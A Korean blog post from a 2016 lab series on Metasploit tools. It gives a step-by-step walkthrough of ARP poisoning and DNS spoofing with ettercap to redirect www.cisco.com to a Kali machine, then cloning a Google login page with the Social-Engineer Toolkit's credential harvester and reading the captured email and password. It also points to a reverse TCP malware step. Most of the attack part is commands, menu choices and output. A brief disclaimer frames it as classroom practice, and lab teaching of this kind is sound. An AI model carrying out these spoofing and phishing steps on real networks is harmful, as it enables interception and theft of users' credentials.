정보보안(구버전)/Metasploit 2016. 6. 7. 17:42
Metasploit - 15. ARP&DNS Spoofing & Setoolkit (Fake Web 사이트 구성)
본 내용은 교육 과정에서 필요한 실습 목적으로 구성된 것이며, 혹시라도 개인적인 용도 및 악의적인 목적으로 사용할 경우, 법적 책임은 본인에게 있다는 것을 알려드립니다.
[실습 시스템] Kali Linux, Firewall, Window7
- ettercap을 이용하여 Firewall과 Window7에 대해서 ARP/DNS 스푸핑을 실시한다.
- setoolkit을 이용하여 Fake Web 사이트를 구성한 다음, ID/Password 정보 수집 테스트를 실시한다.
[실습 단계]
스캔 -> 공격 타겟 선정 -> ARP/DNS Spoofing 실시
Fake Web 사이트 구성 -> Fake Web 사이트 사용자 접속 -> 로그인 -> ID/Password 획득
Ex1) ARP/DNS 스푸핑 실시
- IPv4 Forwarding 기능을 임시적으로 ON 실시
@ Kali Linux
root@kali:~# echo 1 > /proc/sys/net/ipv4/ip_forward
root@kali:~# cat /proc/sys/net/ipv4/ip_forward
1
- ettercap DNS 설정 파일 내용 확인 (www.cisco.com - 192.168.20.50)
root@kali:~# vi /etc/ettercap/etter.dns
~ 중간 생략 ~
############################################### www.cisco.com A 192.168.20.50 ###############################################
: q! |
- 'ettercap' 실행 (사용 방법 : http://net123.tistory.com/267)
root@kali:~# ettercap -G &
① Sniff -> Unified sniffing -> Network Interface : eth1 선택 -> 확인
② Hosts -> Scan for hosts 실시
③ Hosts -> Host List 클릭 -> 목록 확인
- 192.168.20.100 -> Add to Target 1
- 192.168.20.202 -> Add to Target 2
④ Mitm -> ARP poisoning -> Sniffi remote connections 체크 -> 확인
⑤ Plugins -> Manage the plugins -> dns_spoof 더블 클릭
⑥ Start -> Start snffing
Ex2) Fake Web 사이트 구성
@ Kali Linux
root@kali:~# setoolkit
~ 중간 생략 ~
Select from the menu:
1) Social-Engineering Attacks
2) Fast-Track Penetration Testing
3) Third Party Modules
4) Update the Social-Engineer Toolkit
5) Update SET configuration
6) Help, Credits, and About
99) Exit the Social-Engineer Toolkit
~ 중간 생략 ~
1) Spear-Phishing Attack Vectors
2) Website Attack Vectors
3) Infectious Media Generator
4) Create a Payload and Listener
5) Mass Mailer Attack
6) Arduino-Based Attack Vector
7) Wireless Access Point Attack Vector
8) QRCode Generator Attack Vector
9) Powershell Attack Vectors
10) Third Party Modules
99) Return back to the main menu.
set> 2
~ 중간 생략 ~
1) Java Applet Attack Method
2) Metasploit Browser Exploit Method
3) Credential Harvester Attack Method
4) Tabnabbing Attack Method
5) Web Jacking Attack Method
6) Multi-Attack Web Method
7) Full Screen Attack Method
8) HTA Attack Method
99) Return to Main Menu
set:webattack> 3
~ 중간 생략 ~
1) Web Templates
2) Site Cloner
3) Custom Import
99) Return to Webattack Menu
set:webattack> 1
[-] Credential harvester will allow you to utilize the clone capabilities within SET
[-] to harvest credentials or parameters from a website as well as place them into a report
[-] This option is used for what IP the server will POST to.
[-] If you're using an external IP, use your external IP for this
set:webattack> IP address for the POST back in Harvester/Tabnabbing:192.168.20.50
1. Java Required
2. Google
3. Facebook
4. Twitter
5. Yahoo
set:webattack> Select a template: 2
[*] Cloning the website: http://www.google.com
[*] This could take a little bit...
The best way to use this attack is if username and password form
fields are available. Regardless, this captures all POSTs on a website.
[*] Apache is set to ON - everything will be placed in your web root directory of apache.
[*] Files will be written out to the root directory of apache.
[*] ALL files are within your Apache directory since you specified it to ON.
Apache webserver is set to ON. Copying over PHP file to the website.
Please note that all output from the harvester will be found under apache_dir/harvester_date.txt
Feel free to customize post.php in the /var/www directory
[*] All files have been copied to /var/www
{Press return to continue} (엔터)
~ 중간 생략 ~
1) Java Applet Attack Method
2) Metasploit Browser Exploit Method
3) Credential Harvester Attack Method
4) Tabnabbing Attack Method
5) Web Jacking Attack Method
6) Multi-Attack Web Method
7) Full Screen Attack Method
8) HTA Attack Method
99) Return to Main Menu
set:webattack> 99
~ 중간 생략 ~
set> 99
~ 중간 생략 ~
set> 99
Thank you for shopping with the Social-Engineer Toolkit.
Hack the Gibson...and remember...hugs are worth more than handshakes.
root@kali:~#
- '/var/www/html' 디렉토리에 생성된 Google Fake 사이트 관련 파일 확인
root@kali:~# cd /var/www/html
root@kali:/var/www/html# ls
harvester_2016-06-07 16:22:05.629238.txt index.html post.php
Ex3) Window7에서 'http://www.cisco.com' 접속 테스트 실시 - 파이어폭스를 이용하여 'http://www.cisco.com' 접속 실시 및 로그인 실시(abcd@test.com/abcd1234) @ Window7
Ex4) Kali Linux에서 ID/Password 확인 @ Kali Linux root@kali:/var/www/html# ls
root@kali:/var/www/html# rm *
Ex5) 'Reverse TCP' 악성 코드 유입 (앞에 게시물을 참조하여 실시해 본다.) - 참고 : http://net123.tistory.com/297 [유튜브] 동영상 강의 링크 (구독! 좋아요!!!) Metasploit - 제1장 메타스플로잇 (metaspliot)
harvester_2016-06-07 18:00:31.646217.txt index.html post.php
root@kali:/var/www/html#
root@kali:/var/www/html# cat harvester_*.txt | egrep '(Email|Passwd)'
[Email] => abcd@test.com
[Passwd] => abcd1234
root@kali:/var/www/html# cd
root@kali:~#
'정보보안(구버전) > Metasploit' 카테고리의 다른 글
Metasploit - 17. BeEF (Web 브라우저 해킹) (0) | 2016.06.08 |
---|---|
Metasploit - 16. Setoolkit (스팸 메일-링크 악성 코드) (0) | 2016.06.08 |
Metasploit - 14. Setoolkit (Fake Web 사이트 구성) (0) | 2016.06.07 |
Metasploit - 13. Metasploit Window 버전 설치 및 실행 (2) | 2016.06.07 |
Metasploit - 12. 취약점 발견 및 공격 (Password Hash Dump) (0) | 2016.06.07 |